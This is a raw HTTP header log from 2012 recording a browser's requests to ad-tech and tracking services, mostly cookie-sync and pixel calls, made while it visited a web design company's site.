P3P: policyref=&quot;http://ad.afy11.net/privacy.xml&quot;, CP=&quot; NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC&quot;
GET /fr/u.php?p=328546547221502&m=4608069794370173199&t=2592000 HTTP/1.1

Host: www.facebook.com
GET /fr/u.php?p=328546547221502&amp;m=4608069794370173199&amp;t=2592000 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: public, max-age=0
Date: Sun, 18 Nov 2012 20:17:41 PST
Expires: Sun, 18 Nov 2012 20:17:41 PST
Pragma: public
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Encoding: gzip
X-FB-Debug: XJQVGpzg6fI9uS39iVcBXiMMztQbAx2T1hcJEu9ObhE=
Transfer-Encoding: chunked
Connection: keep-alive
GET /partner?adv_id=6481&img=1&uid=4608069794370173199 HTTP/1.1

Host: sync.search.spotxchange.com
GET /partner?adv_id=6481&amp;img=1&amp;uid=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 302 Found

Content-Type: text/html
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Location: partner.html
Date: Mon, 19 Nov 2012 04:17:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 19 Nov 2012 04:17:41 GMT
Location: http://cdn.spotxchange.com/media/thumbs/pixel/pixel.gif
P3P: CP=&quot;NOI DSP COR PSAo PSDo OUR IND UNI COM NAV ADMa&quot;
Pragma: no-cache
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: partner-0=eNptzEELgjAYgOFz%2FZdA51ghdDA0mbR9aMM2bykU2zI7BOr365Po2PXl5WF0F67iA6Obc1bx5MSbLI2NGhCebwSXRWCL0egiaPt61lGNjS5uTX4MzJlvOxxGsNxCJJhQCeN9Tbv8MRtdvVpCLRC%2FdEEEGiKdIUJ9zfCfeb2UP8cz7koi0vsonY9AlSgxmSSKCZRfnmC%2F%2FgCZRDq7; expires=Tue, 19-Mar-2013 04:17:41 GMT; path=/; domain=.spotxchange.com
TCN: choice
Vary: negotiate
Transfer-Encoding: chunked
Connection: keep-alive
GET /cms/v1?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /cms/v1?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&amp;nwid=10000424978&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Mon, 19 Nov 2012 04:17:41 GMT
P3P: policyref=&quot;http://p3p.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV&quot;
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=E0
Cache-Control: private
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
GET /getuid?http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D545979%26ev%3D%24UID HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjKn-qjm'; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgBIAEoATDi5aaFBRDi5aaFBRgB; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:41 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:41 GMT; domain=.adnxs.com; HttpOnly
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=545979&amp;ev=5858721859426781856
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 0
GET /rum?cm_dsp_id=4&external_user_id=4608069794370173199 HTTP/1.1

Host: r.casalemedia.com
GET /rum?cm_dsp_id=4&amp;external_user_id=4608069794370173199 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Expires: Mon, 19 Nov 2012 04:17:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 43
Connection: keep-alive
Set-Cookie: CMID=ZgDQfkPS1IwAAF6ffl4AAAAe;domain=casalemedia.com;path=/;expires=Tue, 19 Nov 2013 04:17:41 GMT CMPS=133;domain=casalemedia.com;path=/;expires=Sun, 17 Feb 2013 04:17:41 GMT CMPP=007;domain=casalemedia.com;path=/;expires=Sun, 17 Feb 2013 04:17:41 GMT CMRUM2=04000000004608069794370173199;domain=casalemedia.com;path=/;expires=Tue, 19 Nov 2013 04:17:41 GMT CMST=UKmy5VCpsuUA;domain=casalemedia.com;path=/;expires=Tue, 20 Nov 2012 04:17:41 GMT CMSC=UKmy5Q**;domain=casalemedia.com;path=/; CMDD=;domain=casalemedia.com;path=/;expires=Tue, 20 Nov 2012 04:17:41 GMT
GET /media/thumbs/pixel/pixel.gif HTTP/1.1

Host: cdn.spotxchange.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: partner-0=eNptzEELgjAYgOFz%2FZdA51ghdDA0mbR9aMM2bykU2zI7BOr365Po2PXl5WF0F67iA6Obc1bx5MSbLI2NGhCebwSXRWCL0egiaPt61lGNjS5uTX4MzJlvOxxGsNxCJJhQCeN9Tbv8MRtdvVpCLRC%2FdEEEGiKdIUJ9zfCfeb2UP8cz7koi0vsonY9AlSgxmSSKCZRfnmC%2F%2FgCZRDq7
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Last-Modified: Thu, 26 May 2011 15:59:36 UTC
Content-Length: 43
Cache-Control: max-age=66677
Date: Mon, 19 Nov 2012 04:17:41 GMT
Connection: keep-alive
GET /b?c1=8&c2=2102&c3=120&c4=&c5=&c15=&c16=&ns__t=1353298661713&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2102&amp;c3=120&amp;c4=&amp;c5=&amp;c15=&amp;c16=&amp;ns__t=1353298661713&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=a2978d-195.159.219.9-1353298656; UIDR=1353298656
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:41 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.TECHNOLOGYCOMPUTING.GRAPHICS.WEBDESIGNHTML,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.300X250 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a9b2e0-21a09-68164-7c0b5
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:41 GMT
Server: QS
GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=E0 HTTP/1.1

Host: r.turn.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
Cookie: uid=4608069794370173199; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C9%7C1001%7Cundefined%7Cundefined%7C10%7Cundefined%7Cundefined%7C12%7Cundefined%7Cundefined%7Cundefined%7C13%7C14%7C15%7Cundefined%7Cundefined%7C16%7C18%7C21%7Cundefined%7Cundefined%7Cundefined%7C26%7Cundefined%7C27; rds=15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7C15663%7Cundefined%7Cundefined%7C15663%7Cundefined%7Cundefined%7Cundefined%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7C15663%7C15663%7C15663%7Cundefined%7Cundefined%7Cundefined%7C15663%7Cundefined%7C15663; rv=1
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache-Coyote/1.1
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV&quot;
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069794370173199; Domain=.turn.com; Expires=Sat, 18-May-2013 04:17:41 GMT; Path=/
Content-Length: 43
Date: Mon, 19 Nov 2012 04:17:41 GMT
GET /adserver/ako?rsi_random=442148774&rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&rsi_site=8EAA6BB1DC11BF97CF079B3861A1A66E&rsi_width=300&rsi_height=250&rsi_secure=0&rsi_url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rsi_referrer=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&rsi_title=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&rsi_inf=1 HTTP/1.1

Host: ads.revsci.net
GET /adserver/ako?rsi_random=442148774&amp;rsi_pub=5EDFA30EEE61C6AE22A15EFEDE1C37E5&amp;rsi_site=8EAA6BB1DC11BF97CF079B3861A1A66E&amp;rsi_width=300&amp;rsi_height=250&amp;rsi_secure=0&amp;rsi_url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rsi_referrer=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php%3Fwebsite-design-and-development-services-web-company%3Dseo&amp;rsi_title=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;rsi_inf=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: rsiPus_AAAA=&quot;MLuBM15VA1wBU9RGEhNBG1ITQxIVABP8ENoBQkMWVBRaF0cTcF20tNgLxppt8AlAFw9vaz9Aavk=&quot;
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref=&quot;http://js.revsci.net/w3c/rsip3p.xml&quot;, CP=&quot;NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA&quot;
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver rsiPus_AAAA=&quot;&quot;; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ rsiPus_AAAA=&quot;MLtPrc98cF5/JjEy+8IwTsupVEgsLmeT3lsZNcNA4DLJSFos5FKsMmdLWRrDDt9GIKJTfMMm90oD9QpUg7ib1Y2QoxY+jd4c0r2PVwV7m2Rh95t0DVqpUG0Db/4UbnxBoH+vprPISgO6vys2RFMxm6hwpY8DDQ==&quot;; Version=1; Domain=.revsci.net; Max-Age=63072000; Path=/
Location: http://adnxs.revsci.net/imp?Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=698192661&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Content-Length: 0
Date: Mon, 19 Nov 2012 04:17:41 GMT
GET /v2/cexposer/SIG=1b3kbie0a/*http%3A//ad.yieldmanager.com/imp?anmember=514&anprice=40&Z=160x600&s=653070&r=0&_salt=1488817&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&B=1 HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=1b3kbie0a/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=40&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Mon, 19 Nov 2012 04:17:41 GMT
Set-Cookie: B=4leg2ah8ajcn5&amp;b=3&amp;s=05; expires=Tue, 20-Nov-2014 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?anmember=514&amp;anprice=40&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1488817&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1&amp;SIG=10v8trh4u;x-cookie=4yrt2nu8nwpa5&amp;o=3&amp;f=05
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /bh/visitormatch?tag=66901&pid=520266 HTTP/1.1

Host: bh.contextweb.com
GET /bh/visitormatch?tag=66901&amp;pid=520266 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=2; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-98-219-7
Date: Mon, 19 Nov 2012 04:17:41 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:41 GMT; Path=/ pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:41 GMT; Path=/
Content-Length: 2211
Connection: keep-alive
GET /imp?Z=300x250&s=1651067&r=0&_salt=698192661&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: adnxs.revsci.net
GET /imp?Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=698192661&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: rsiPus_AAAA=&quot;MLtPrc98cF5/JjEy+8IwTsupVEgsLmeT3lsZNcNA4DLJSFos5FKsMmdLWRrDDt9GIKJTfMMm90oD9QpUg7ib1Y2QoxY+jd4c0r2PVwV7m2Rh95t0DVqpUG0Db/4UbnxBoH+vprPISgO6vys2RFMxm6hwpY8DDQ==&quot;
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Date: Mon, 19 Nov 2012 04:17:41 GMT
Content-Length: 459
GET /bh/rtset?do=add&pid=545979&ev=5858721859426781856 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=545979&amp;ev=5858721859426781856 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3-a1bVT-F6HJlfJrS7NCZfQtTK0a0zp6fORVU9k057LWIC9-6ST6pzQ; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353298784332; V=Cp3qDslEoSFB; vf=2; wf=0; pb_rtb_ev=2-530731..0.0.1353298658421|535461.4608069794370173199.0.0.1353298661541|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|537085..0.0.1353298658421|541254..0.0.1353298658421|536088..0.0.1353298658421|543921..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979..0.0.1353298658421|531292..0.0.1353298658421|535039..0.0.1353298658421|543604..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; 66901_300X250__POSUNKNOWNXUNKNOWN=1353298786770
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-119-17-88
Date: Mon, 19 Nov 2012 04:17:41 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=Cp3qDslEoSFB; Domain=.contextweb.com; Expires=Thu, 14-Nov-2013 04:17:41 GMT; Path=/ pb_rtb_ev=2-535461.4608069794370173199.0.0.1353298661541|530731..0.0.1353298658421|531399..0.0.1353298658421|530912..0.0.1353298658421|535495..0.0.1353298658421|540281..0.0.1353298658421|534301..0.0.1353298658421|535393..0.0.1353298658421|541254..0.0.1353298658421|537085..0.0.1353298658421|543921..0.0.1353298658421|536088..0.0.1353298658421|538569.db273952-68a4-4097-8df2-7d98b16e5711.0.0.1353298658835|545979.5858721859426781856.0.0.1353298661823|531292..0.0.1353298658421|543604..0.0.1353298658421|535039..0.0.1353298658421|530739.50a9b2e2-9d68-d676-6901-3c5fafca2592.0.0.1353298661043|537583..0.0.1353298658421|547259..0.0.1353298658421; Domain=.contextweb.com; Expires=Tue, 19-Nov-2013 04:17:41 GMT; Path=/
Content-Length: 49
Connection: keep-alive
